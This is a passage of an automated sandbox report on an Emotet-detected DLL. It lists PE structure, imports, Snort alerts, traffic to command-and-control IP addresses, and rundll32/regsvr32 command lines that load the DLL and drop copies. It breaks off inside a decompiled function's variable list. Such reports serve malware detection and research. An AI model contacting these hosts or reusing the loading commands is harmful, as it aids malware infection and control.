mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]

Rich Headers

Programming Language:

[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7cda0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cdf8	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x87000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x82000	0x192c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0x66c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7a410	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7a430	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x38000	0x370	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x36fd5	0x37000	False	0.38967507102272725	data	5.930785005703424	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x38000	0x4597a	0x45a00	False	0.670532007405745	data	6.275631514515963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x3394	0xc00	False	0.18294270833333334	DOS executable (block device driver \337-\231+])	2.573523630872546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x82000	0x192c	0x1a00	False	0.4794170673076923	data	5.1711441720039435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x84000	0xdc	0x200	False	0.244140625	Spectrum .TAP data "6 " - BASIC program	1.1531659578770692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gxfg	0x85000	0x1000	0x1000	False	0.44091796875	data	5.088628746947821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gehcont	0x86000	0xc	0x200	False	0.0390625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x87000	0x1e0	0x200	False	0.52734375	data	4.724728911998389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0x66c	0x800	False	0.537109375	data	4.9054360857170005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x87060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
USER32.dll	EndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
GDI32.dll	Polyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize
CRYPT32.dll	CryptStringToBinaryA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x180013f70

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5115.178.55.2249707802404304 11/13/22-18:35:31.861704	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49707	80	192.168.2.5	115.178.55.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 18:35:31.861704111 CET	49707	80	192.168.2.5	115.178.55.22
Nov 13, 2022 18:35:32.163347006 CET	80	49707	115.178.55.22	192.168.2.5
Nov 13, 2022 18:35:32.673394918 CET	49707	80	192.168.2.5	115.178.55.22
Nov 13, 2022 18:35:32.974811077 CET	80	49707	115.178.55.22	192.168.2.5
Nov 13, 2022 18:35:33.485922098 CET	49707	80	192.168.2.5	115.178.55.22
Nov 13, 2022 18:35:33.787590027 CET	80	49707	115.178.55.22	192.168.2.5
Nov 13, 2022 18:35:39.860419989 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:40.033946991 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.034379005 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:40.070290089 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:40.244028091 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.259675026 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.259735107 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.259816885 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:40.272959948 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:40.446254969 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.447307110 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:40.580375910 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:42.103576899 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:42.103631973 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:42.276755095 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:42.276786089 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:43.193051100 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:43.193084955 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:43.193196058 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:46.194777012 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:46.194809914 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:46.194935083 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:46.195194960 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:46.195350885 CET	49708	8080	192.168.2.5	172.105.115.71
Nov 13, 2022 18:35:46.368212938 CET	8080	49708	172.105.115.71	192.168.2.5
Nov 13, 2022 18:35:46.368247986 CET	8080	49708	172.105.115.71	192.168.2.5

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll64.exePID: 4084, Parent PID: 3324

General

Target ID:	0
Start time:	18:34:42
Start date:	13/11/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\DVvzRulsoR.dll"
Imagebase:	0x7ff734e70000
File size:	139776 bytes
MD5 hash:	C676FC0263EDD17D4CE7D644B8F3FCD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.324074867.000001D0BF950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2824, Parent PID: 4084

General

Target ID:	1
Start time:	18:34:43
Start date:	13/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1348, Parent PID: 4084

General

Target ID:	2
Start time:	18:34:43
Start date:	13/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1
Imagebase:	0x7ff627730000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1252, Parent PID: 4084

General

Target ID:	3
Start time:	18:34:43
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\DVvzRulsoR.dll
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.324141127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.323254712.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4180, Parent PID: 1348

General

Target ID:	4
Start time:	18:34:43
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1
Imagebase:	0x7ff74fee0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.319410321.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.319556168.000001D380100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1244, Parent PID: 4084

General

Target ID:	5
Start time:	18:34:43
Start date:	13/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\DVvzRulsoR.dll,DllRegisterServer
Imagebase:	0x7ff74fee0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.321746653.0000020F583F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.321330759.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 4980, Parent PID: 4180

General

Target ID:	6
Start time:	18:34:50
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll"
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.824832389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.824606786.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2008, Parent PID: 1244

General

Target ID:	7
Start time:	18:34:51
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OjshMzvO\drOxhskRmolSyam.dll"
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5536, Parent PID: 1252

General

Target ID:	8
Start time:	18:34:51
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XvLyRsZAjXO\BWic.dll"
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5892, Parent PID: 4084

General

Target ID:	9
Start time:	18:34:51
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HAZEhjzZpU\MdCGCivK.dll"
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5180, Parent PID: 3324

General

Target ID:	12
Start time:	18:35:57
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.473975639.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.474190042.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1776, Parent PID: 5180

General

Target ID:	13
Start time:	18:36:02
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\PbznyUjcmjZG\mlrNU.dll"
Imagebase:	0x7ff727cf0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll64.exePID: 4084, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	2.2%
Signature Coverage:	9.5%
Total number of Nodes:	695
Total number of Limit Nodes:	12

Executed Functions

Function 00007FFA09503FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFA7FFA09503FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v657;
				char _v658;
				char _v659;
				char _v660;
				char _v661;
				char _v662;
				char _v663;
				char _v664;
				char _v665;
				char _v666;
				char _v667;
				char _v668;
				char _v669;
				char _v670;
				char _v671;
				char _v672;
				char _v673;
				char _v674;
				char _v675;
				char _v676;
				char _v677;
				char _v678;
				char _v679;
				char _v680;
				char _v681;
				char _v682;
				char _v683;
				char _v684;
				char _v685;
				char _v686;
				char _v687;
				char _v688;
				char _v689;
				char _v690;
				char _v691;
				char _v692;
				char _v693;
				char _v694;
				char _v695;
				char _v696;
				char _v697;
				char _v698;
				char _v699;
				char _v700;
				char _v701;
				char _v702;
				char _v703;
				char _v704;
				char _v705;
				char _v706;
				char _v707;
				char _v708;
				char _v709;
				char _v710;
				char _v711;
				char _v712;
				char _v713;
				char _v714;
				char _v715;
				char _v716;
				char _v717;
				char _v718;
				char _v719;
				char _v720;
				char _v721;
				char _v722;
				char _v723;
				char _v724;
				char _v725;
				char _v726;
				char _v727;
				char _v728;
				char _v729;
				char _v730;
				char _v731;
				char _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				char _v737;
				char _v738;
				char _v739;
				char _v740;
				char _v741;
				char _v742;
				char _v743;
				char _v744;
				char _v745;
				char _v746;
				char _v747;
				char _v748;
				char _v749;
				char _v750;
				char _v751;
				char _v752;
				char _v753;
				char _v754;
				char _v755;
				char _v756;
				char _v757;
				char _v758;
				char _v759;
				char _v760;
				char _v761;
				char _v762;
				char _v763;
				char _v764;
				char _v765;
				char _v766;
				char _v767;
				char _v768;
				char _v769;
				char _v770;
				char _v771;
				char _v772;
				char _v773;
				char _v774;
				char _v775;
				char _v776;
				char _v777;
				char _v778;
				char _v779;
				char _v780;
				char _v781;
				char _v782;
				char _v783;
				char _v784;
				char _v785;
				char _v786;
				char _v787;
				char _v788;
				char _v789;
				char _v790;
				char _v791;
				char _v792;
				char _v793;
				char _v794;
				char _v795;
				char _v796;
				char _v797;
				char _v798;
				char _v799;
				char _v800;
				char _v801;
				char _v802;
				char _v803;
				char _v804;
				char _v805;
				char _v806;
				char _v807;
				char _v808;
				char _v809;
				char _v810;
				char _v811;
				char _v812;
				char _v813;
				char _v814;
				char _v815;
				char _v816;
				char _v817;
				char _v818;
				char _v819;
				char _v820;
				char _v821;
				char _v822;
				char _v823;
				char _v824;
				char _v825;
				char _v826;
				char _v827;
				char _v828;
				char _v829;
				char _v830;
				char _v831;
				char _v832;
				char _v833;
				char _v834;
				char _v835;
				char _v836;
				char _v837;
				char _v838;
				char _v839;
				char _v840;
				char _v841;
				char _v842;
				char _v843;
				char _v844;
				char _v845;
				char _v846;
